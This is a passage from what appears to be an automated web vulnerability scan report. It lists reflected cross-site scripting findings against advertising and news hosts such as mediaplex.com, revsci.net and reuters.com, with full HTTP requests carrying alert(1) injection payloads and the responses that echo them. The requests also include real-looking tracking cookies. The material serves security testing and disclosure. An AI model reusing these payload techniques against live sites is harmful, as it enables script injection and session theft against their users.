Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:10 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17689
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=21007378077849c55";alert(1)//4a80fa0abd1\" target=\"_blank\">
...[SNIP]...

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7e4"%3balert(1)//0517f93f112 was submitted in the mpvc parameter. This input was echoed as ba7e4";alert(1)//0517f93f112 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D210073780778&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253Dba7e4"%3balert(1)//0517f93f112 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:14 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17665
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
dvertising.com%2Fclick%2Fsite%3D0000777384%2Fmnum%3D0000951470%2Fcstr%3D75633200%3D_4d58868a%2C6132271880%2C777384%5E951470%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D75633200%2Foptn%3D64%3Ftrg%3Dba7e4";alert(1)//0517f93f112http://rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D
...[SNIP]...

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>c7aa141f23a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256927cd5"><script>alert(1)</script>c7aa141f23a&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22215
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256927cd5"><script>alert(1)</script>c7aa141f23a" TARGET="_blank">
...[SNIP]...

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51fd6"%3balert(1)//2297f36f9b7 was submitted in the mpck parameter. This input was echoed as 51fd6";alert(1)//2297f36f9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256951fd6"%3balert(1)//2297f36f9b7&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21999
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256951fd6";alert(1)//2297f36f9b7", "6781558", "<geozip/>
...[SNIP]...

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d29e"%3balert(1)//977552208d was submitted in the mpvc parameter. This input was echoed as 1d29e";alert(1)//977552208d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f1d29e"%3balert(1)//977552208d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:11 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21905
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f1d29e";alert(1)//977552208dhttp://rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa1
...[SNIP]...

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fe"><script>alert(1)</script>f4af9e30ca7 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f6d4fe"><script>alert(1)</script>f4af9e30ca7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22129
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f6d4fe"><script>alert(1)</script>f4af9e30ca7http://rover.ebay.com/rover/1/711-118167-1915-16/4?mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&
...[SNIP]...

1.188. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 61c78<script>alert(1)</script>60081d2e459 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J0553161c78<script>alert(1)</script>60081d2e459 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d73ef70&0&&4d4e2349&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07608=0105974ea67d21e1&G07608&0&4d73f5b7&0&&4d4e15ec&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_C07583=0105974ea67d21e1&C07583&0&4d74e384&0&&4d4f68ce&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d74ec12&0&&4d4e3c30&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_E08745=0105974ea67d21e1&E08745&0&4d7a314a&0&&4d54abd9&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_L09857=0105974ea67d21e1&L09857&0&4d7a5dc4&0&&4d550056&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A10863=0105974ea67d21e1&A10863&0&4d7b9c60&0&&4d54f31a&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H07710=0105974ea67d21e1&H07710&0&4d7bcd81&0&&4d55f92b&4c5cffb70704da9ab1f721e8ae18383d; udm_0=...[SNIP]...; rtc_0=...[SNIP]...; rsi_segs_1000000=...[SNIP]...; rsi_us_1000000=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 14 Feb 2011 01:34:46 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 15 Feb 2011 01:34:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J0553161C78<SCRIPT>ALERT(1)</SCRIPT>60081D2E459" was not recognized.
*/

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.uk.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1f59%3balert(1)//ba2841abbb3 was submitted in the callback parameter. This input was echoed as e1f59;alert(1)//ba2841abbb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationse1f59%3balert(1)//ba2841abbb3&ed=uk&u=173.193.214.243-2605364368.30126492 HTTP/1.1
Host: js.uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28259640.1297647396.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28259640.2003575633.1297647396.1297647396.1297647396.1; __utmc=28259640; __utmb=28259640.1.10.1297647396; rsi_segs=D08734_70009|D08734_70011|D08734_70049|D08734_70057|D08734_70075|D08734_70086|D08734_70093|D08734_70509|D08734_71432

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:39:11 GMT
Server: Apache-Coyote/1.1
Expires: Mon, 14 Feb 2011 01:49:12 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Connection: close
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3 === 'function') {Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3([]);}

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.dailymail/ron_052010

Issue detail

